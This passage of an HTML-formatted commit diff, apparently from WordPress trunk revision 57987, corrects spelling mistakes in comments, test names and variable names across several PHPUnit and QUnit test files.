</span><span class="cx" style="display: block; padding: 0 10px"> foreach ( $theme['Template Files'] as $path ) {
</span></span></pre></div>
<a id="trunktestsphpunittestsusercapabilitiesphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/user/capabilities.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/user/capabilities.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/user/capabilities.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -992,7 +992,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Change the capabilites associated with a role and make sure the change
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Change the capabilities associated with a role and make sure the change
</ins><span class="cx" style="display: block; padding: 0 10px"> * is reflected in has_cap().
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_role_add_cap() {
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1033,7 +1033,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Change the capabilites associated with a role and make sure the change
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Change the capabilities associated with a role and make sure the change
</ins><span class="cx" style="display: block; padding: 0 10px"> * is reflected in has_cap().
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_role_remove_cap() {
</span></span></pre></div>
<a id="trunktestsphpunittestsusermapMetaCapphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/user/mapMetaCap.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/user/mapMetaCap.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/user/mapMetaCap.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -357,7 +357,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 27020
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_authorless_posts_capabilties() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_authorless_posts_capabilities() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $post_id = self::factory()->post->create(
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'post_author' => 0,
</span></span></pre></div>
<a id="trunktestsphpunittestsuserwpGetUsersWithNoRolephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/user/wpGetUsersWithNoRole.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/user/wpGetUsersWithNoRole.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/user/wpGetUsersWithNoRole.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -111,10 +111,10 @@
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_get_users_with_no_role_matches_on_role_name() {
</span><span class="cx" style="display: block; padding: 0 10px"> // Create a role with a display name which would not match the role name
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // in a case-insentive SQL query.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // in a case-insensitive SQL query.
</ins><span class="cx" style="display: block; padding: 0 10px"> wp_roles()->add_role( 'somerole', 'Some role display name' );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $someuser = self::factory()->user->create(
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ self::factory()->user->create(
</ins><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'role' => 'somerole',
</span><span class="cx" style="display: block; padding: 0 10px"> )
</span></span></pre></div>
<a id="trunktestsphpunittestsuserphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/user.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/user.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/user.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1491,7 +1491,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> // Assert recipient is correct.
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( $new_email, $recipient->address, 'Admin email change notification recipient not as expected' );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Assert that HTML entites have been decode in body and subject.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Assert that HTML entities have been decode in body and subject.
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertStringContainsString( '\'Test\' blog\'s "name" has <html entities> &', $email->subject, 'Email subject does not contain the decoded HTML entities' );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertStringNotContainsString( ''Test' blog's "name" has <html entities> &', $email->subject, $email->subject, 'Email subject does contains HTML entities' );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1794,7 +1794,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> // Assert recipient is correct.
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 'new-email@test.dev', $recipient->address, 'User email change confirmation recipient not as expected' );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Assert that HTML entites have been decoded in body and subject.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Assert that HTML entities have been decoded in body and subject.
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertStringContainsString( '\'Test\' blog\'s "name" has <html entities> &', $email->subject, 'Email subject does not contain the decoded HTML entities' );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertStringNotContainsString( ''Test' blog's "name" has <html entities> &', $email->subject, 'Email subject does contains HTML entities' );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span></span></pre></div>
<a id="trunktestsphpunittestswidgetswpWidgetMediaImagephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/widgets/wpWidgetMediaImage.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/widgets/wpWidgetMediaImage.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/widgets/wpWidgetMediaImage.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -478,7 +478,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertStringContainsString( 'width="100"', $output );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertStringContainsString( 'height="100"', $output );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Embeded images.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Embedded images.
</ins><span class="cx" style="display: block; padding: 0 10px"> ob_start();
</span><span class="cx" style="display: block; padding: 0 10px"> $widget->render_media(
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span></span></pre></div>
<a id="trunktestsphpunittestsxmlrpcwpnewCommentphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/xmlrpc/wp/newComment.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/xmlrpc/wp/newComment.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/xmlrpc/wp/newComment.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -270,7 +270,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @param string $post_key Post identifier from the self::$posts array.
</span><span class="cx" style="display: block; padding: 0 10px"> * @param string $username Username leaving comment.
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @param bool $expected Expected result. True: successfull comment. False: Refused comment.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @param bool $expected Expected result. True: successful comment. False: Refused comment.
</ins><span class="cx" style="display: block; padding: 0 10px"> * @param string $anon_callback Optional. Allow anonymous comment callback. Default __return_false.
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_comments_observe_post_permissions( $post_key, $username, $expected, $anon_callback = '__return_false' ) {
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -304,7 +304,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * @return array[] {
</span><span class="cx" style="display: block; padding: 0 10px"> * @type string Post identifier from the self::$posts array.
</span><span class="cx" style="display: block; padding: 0 10px"> * @type string Username leaving comment.
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @type bool Expected result. True: successfull comment. False: Refused comment.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @type bool Expected result. True: successful comment. False: Refused comment.
</ins><span class="cx" style="display: block; padding: 0 10px"> * @type string Optional. Allow anonymous comment callback. Default __return_false.
</span><span class="cx" style="display: block; padding: 0 10px"> * }
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span></span></pre></div>
<a id="trunktestsphpunittestsxmlrpcwpnewPostphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/xmlrpc/wp/newPost.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/xmlrpc/wp/newPost.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/xmlrpc/wp/newPost.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -247,7 +247,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $post = array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'post_title' => 'Test',
</span><span class="cx" style="display: block; padding: 0 10px"> 'terms' => array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'foobar_nonexistant' => array( 1 ),
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'foobar_nonexistent' => array( 1 ),
</ins><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px"> $result = $this->myxmlrpcserver->wp_newPost( array( 1, 'editor', 'editor', $post ) );
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -257,7 +257,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $post2 = array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'post_title' => 'Test',
</span><span class="cx" style="display: block; padding: 0 10px"> 'terms_names' => array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'foobar_nonexistant' => array( 1 ),
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'foobar_nonexistent' => array( 1 ),
</ins><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px"> $result2 = $this->myxmlrpcserver->wp_newPost( array( 1, 'editor', 'editor', $post2 ) );
</span></span></pre></div>
<a id="trunktestsqunitwpadminjscustomizecontrolsjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/qunit/wp-admin/js/customize-controls.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/qunit/wp-admin/js/customize-controls.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/qunit/wp-admin/js/customize-controls.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -679,17 +679,17 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> QUnit.module( 'Customize Utils: wp.customize.utils.getRemainingTime()' );
</span><span class="cx" style="display: block; padding: 0 10px"> QUnit.test( 'utils.getRemainingTime calculates time correctly', function( assert ) {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- var datetime = '2599-08-06 12:12:13', timeRemaining, timeRemainingWithDateInstance, timeRemaingingWithTimestamp;
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ var datetime = '2599-08-06 12:12:13', timeRemaining, timeRemainingWithDateInstance, timeRemainingWithTimestamp;
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> timeRemaining = wp.customize.utils.getRemainingTime( datetime );
</span><span class="cx" style="display: block; padding: 0 10px"> timeRemainingWithDateInstance = wp.customize.utils.getRemainingTime( new Date( datetime.replace( /-/g, '/' ) ) );
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- timeRemaingingWithTimestamp = wp.customize.utils.getRemainingTime( ( new Date( datetime.replace( /-/g, '/' ) ) ).getTime() );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ timeRemainingWithTimestamp = wp.customize.utils.getRemainingTime( ( new Date( datetime.replace( /-/g, '/' ) ) ).getTime() );
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> assert.equal( typeof timeRemaining, 'number', timeRemaining );
</span><span class="cx" style="display: block; padding: 0 10px"> assert.equal( typeof timeRemainingWithDateInstance, 'number', timeRemaining );
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- assert.equal( typeof timeRemaingingWithTimestamp, 'number', timeRemaining );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ assert.equal( typeof timeRemainingWithTimestamp, 'number', timeRemaining );
</ins><span class="cx" style="display: block; padding: 0 10px"> assert.deepEqual( timeRemaining, timeRemainingWithDateInstance );
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- assert.deepEqual( timeRemaining, timeRemaingingWithTimestamp );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ assert.deepEqual( timeRemaining, timeRemainingWithTimestamp );
</ins><span class="cx" style="display: block; padding: 0 10px"> });
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> QUnit.module( 'Customize Utils: wp.customize.utils.getCurrentTimestamp()' );
</span></span></pre></div>
<a id="trunktestsqunitwpadminjsupdatesjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/qunit/wp-admin/js/updates.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/qunit/wp-admin/js/updates.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/qunit/wp-admin/js/updates.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -15,9 +15,9 @@
</span><span class="cx" style="display: block; padding: 0 10px"> var menuItemCount = $( '#menu-plugins' ).find( '.plugin-count' ).eq( 0 ).text();
</span><span class="cx" style="display: block; padding: 0 10px"> var screenReaderItemCount = $( '#wp-admin-bar-updates' ).find( '.screen-reader-text' ).text();
</span><span class="cx" style="display: block; padding: 0 10px"> var adminItemCount = $( '#wp-admin-bar-updates' ).find( '.ab-label' ).text();
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- assert.equal( menuItemCount, 2, 'Intial value is correct' );
- assert.equal( screenReaderItemCount, '2 Plugin Updates', 'Intial value is correct' );
- assert.equal( adminItemCount, 2, 'Intial value is correct' );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ assert.equal( menuItemCount, 2, 'Initial value is correct' );
+ assert.equal( screenReaderItemCount, '2 Plugin Updates', 'Initial value is correct' );
+ assert.equal( adminItemCount, 2, 'Initial value is correct' );
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> wp.updates.decrementCount( 'plugin' );
</span><span class="cx" style="display: block; padding: 0 10px">
</span></span></pre>
</div>
</div>
</body>
</html>